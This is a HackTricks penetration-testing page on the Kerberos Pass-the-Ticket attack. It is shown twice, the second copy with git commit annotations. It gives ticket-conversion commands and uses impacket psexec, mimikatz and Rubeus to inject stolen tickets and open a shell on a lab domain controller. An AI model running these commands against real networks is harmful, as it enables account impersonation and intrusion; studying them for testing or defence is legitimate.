hacktricks/windows-hardening/active-directory-methodology/pass-the-ticket.md

# Pass the Ticket

<details>

<summary><strong>Support HackTricks and get benefits!</strong></summary>

* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**

</details>

<img src="../../.gitbook/assets/image (10).png" alt="" data-size="original">

**Security Skills as a Service** platform bridges the current skill set gap by combining **global offensive security talent with smart automation**, providing real-time data you need to make informed decisions.

{% embed url="https://www.syncubes.com/" %}

## Pass The Ticket (PTT)

This kind of attack is similar to Pass the Key, but instead of using hashes to request a ticket, the ticket itself is stolen and used to authenticate as its owner.

**Read**:

* [Harvesting tickets from Windows](../../network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-windows.md)
* [Harvesting tickets from Linux](../../network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-linux.md)

### **Swaping Linux and Windows tickets between platforms**

The [ticket\_converter](https://github.com/Zer1t0/ticket\_converter) script. The only needed parameters are the current ticket and the output file, it automatically detects the input ticket file format and converts it. For example:

```
root@kali:ticket_converter# python ticket_converter.py velociraptor.ccache velociraptor.kirbi
Converting ccache => kirbi
root@kali:ticket_converter# python ticket_converter.py velociraptor.kirbi velociraptor.ccache
Converting kirbi => ccache
```

[Kekeo](https://github.com/gentilkiwi/kekeo), to convert them in Windows. This tool was not checked due to requiring a license in their ASN1 library, but I think it is worth mentioning.

### Pass The Ticket Attack

{% code title="Linux" %}
```bash
export KRB5CCNAME=/root/impacket-examples/krb5cc_1120601113_ZFxZpK 
python psexec.py jurassic.park/trex@labwws02.jurassic.park -k -no-pass
```
{% endcode %}

{% code title="Windows" %}
```bash
#Load the ticket in memory using mimikatz or Rubeus
mimikatz.exe "kerberos::ptt [0;28419fe]-2-1-40e00000-trex@krbtgt-JURASSIC.PARK.kirbi"
.\Rubeus.exe ptt /ticket:[0;28419fe]-2-1-40e00000-trex@krbtgt-JURASSIC.PARK.kirbi
klist #List tickets in cache to cehck that mimikatz has loaded the ticket
.\PsExec.exe -accepteula \\lab-wdc01.jurassic.park cmd
```
{% endcode %}

<img src="../../.gitbook/assets/image (10).png" alt="" data-size="original">

**Security Skills as a Service** platform bridges the current skill set gap by combining **global offensive security talent with smart automation**, providing real-time data you need to make informed decisions.

{% embed url="https://www.syncubes.com/" %}

<details>

<summary><strong>Support HackTricks and get benefits!</strong></summary>

* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**

</details>
GitBook: [#3160] No subject 2022-05-01 13:25:53 +00:00			`# Pass the Ticket`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`<details>`

			`<summary><strong>Support HackTricks and get benefits!</strong></summary>`

GitBook: [#3522] No subject 2022-09-30 10:27:15 +00:00			`* Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? or do you want to have access to the latest version of the PEASS or download HackTricks in PDF? Check the [SUBSCRIPTION PLANS](https://github.com/sponsors/carlospolop)!`
			`* Discover [The PEASS Family](https://opensea.io/collection/the-peass-family), our collection of exclusive [NFTs](https://opensea.io/collection/the-peass-family)`
			`* Get the [official PEASS & HackTricks swag](https://peass.creator-spring.com)`
			`* Join the [💬](https://emojipedia.org/speech-balloon/) [Discord group](https://discord.gg/hRep4RUj7f) or the [telegram group](https://t.me/peass) or follow me on Twitter [🐦](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[@carlospolopm](https://twitter.com/carlospolopm).`
			`* Share your hacking tricks by submitting PRs to the [hacktricks github repo](https://github.com/carlospolop/hacktricks).`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`

GitBook: [#3523] No subject 2022-09-30 10:43:59 +00:00			`<img src="../../.gitbook/assets/image (10).png" alt="" data-size="original">`
GitBook: [#3240] No subject 2022-06-06 22:28:05 +00:00
syn cubes 2022-09-27 00:18:19 +00:00			`Security Skills as a Service platform bridges the current skill set gap by combining global offensive security talent with smart automation, providing real-time data you need to make informed decisions.`
GitBook: [#3240] No subject 2022-06-06 22:28:05 +00:00
syn cubes 2022-09-27 00:18:19 +00:00			`{% embed url="https://www.syncubes.com/" %}`
GitBook: [#3240] No subject 2022-06-06 22:28:05 +00:00
GitBook: [#3160] No subject 2022-05-01 13:25:53 +00:00			`## Pass The Ticket (PTT)`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
			`This kind of attack is similar to Pass the Key, but instead of using hashes to request a ticket, the ticket itself is stolen and used to authenticate as its owner.`

			`Read:`

GitBook: [#3160] No subject 2022-05-01 13:25:53 +00:00			`* [Harvesting tickets from Windows](../../network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-windows.md)`
			`* [Harvesting tickets from Linux](../../network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-linux.md)`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
GitBook: [#3160] No subject 2022-05-01 13:25:53 +00:00			`### Swaping Linux and Windows tickets between platforms`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
GitBook: [#3160] No subject 2022-05-01 13:25:53 +00:00			`The [ticket\_converter](https://github.com/Zer1t0/ticket\_converter) script. The only needed parameters are the current ticket and the output file, it automatically detects the input ticket file format and converts it. For example:`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
GitBook: [#3160] No subject 2022-05-01 13:25:53 +00:00			```
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`root@kali:ticket_converter# python ticket_converter.py velociraptor.ccache velociraptor.kirbi`
			`Converting ccache => kirbi`
			`root@kali:ticket_converter# python ticket_converter.py velociraptor.kirbi velociraptor.ccache`
			`Converting kirbi => ccache`
			```

			`[Kekeo](https://github.com/gentilkiwi/kekeo), to convert them in Windows. This tool was not checked due to requiring a license in their ASN1 library, but I think it is worth mentioning.`

GitBook: [#3160] No subject 2022-05-01 13:25:53 +00:00			`### Pass The Ticket Attack`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
			`{% code title="Linux" %}`
			```bash
			`export KRB5CCNAME=/root/impacket-examples/krb5cc_1120601113_ZFxZpK`
			`python psexec.py jurassic.park/trex@labwws02.jurassic.park -k -no-pass`
			```
			`{% endcode %}`

			`{% code title="Windows" %}`
			```bash
			`#Load the ticket in memory using mimikatz or Rubeus`
			`mimikatz.exe "kerberos::ptt [0;28419fe]-2-1-40e00000-trex@krbtgt-JURASSIC.PARK.kirbi"`
			`.\Rubeus.exe ptt /ticket:[0;28419fe]-2-1-40e00000-trex@krbtgt-JURASSIC.PARK.kirbi`
			`klist #List tickets in cache to cehck that mimikatz has loaded the ticket`
			`.\PsExec.exe -accepteula \\lab-wdc01.jurassic.park cmd`
			```
			`{% endcode %}`

GitBook: [#3523] No subject 2022-09-30 10:43:59 +00:00			`<img src="../../.gitbook/assets/image (10).png" alt="" data-size="original">`
GitBook: [#3240] No subject 2022-06-06 22:28:05 +00:00
syn cubes 2022-09-27 00:18:19 +00:00			`Security Skills as a Service platform bridges the current skill set gap by combining global offensive security talent with smart automation, providing real-time data you need to make informed decisions.`
GitBook: [#3240] No subject 2022-06-06 22:28:05 +00:00
syn cubes 2022-09-27 00:18:19 +00:00			`{% embed url="https://www.syncubes.com/" %}`
GitBook: [#3240] No subject 2022-06-06 22:28:05 +00:00
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00			`<details>`

			`<summary><strong>Support HackTricks and get benefits!</strong></summary>`

GitBook: [#3522] No subject 2022-09-30 10:27:15 +00:00			`* Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? or do you want to have access to the latest version of the PEASS or download HackTricks in PDF? Check the [SUBSCRIPTION PLANS](https://github.com/sponsors/carlospolop)!`
			`* Discover [The PEASS Family](https://opensea.io/collection/the-peass-family), our collection of exclusive [NFTs](https://opensea.io/collection/the-peass-family)`
			`* Get the [official PEASS & HackTricks swag](https://peass.creator-spring.com)`
			`* Join the [💬](https://emojipedia.org/speech-balloon/) [Discord group](https://discord.gg/hRep4RUj7f) or the [telegram group](https://t.me/peass) or follow me on Twitter [🐦](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[@carlospolopm](https://twitter.com/carlospolopm).`
			`* Share your hacking tricks by submitting PRs to the [hacktricks github repo](https://github.com/carlospolop/hacktricks).`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`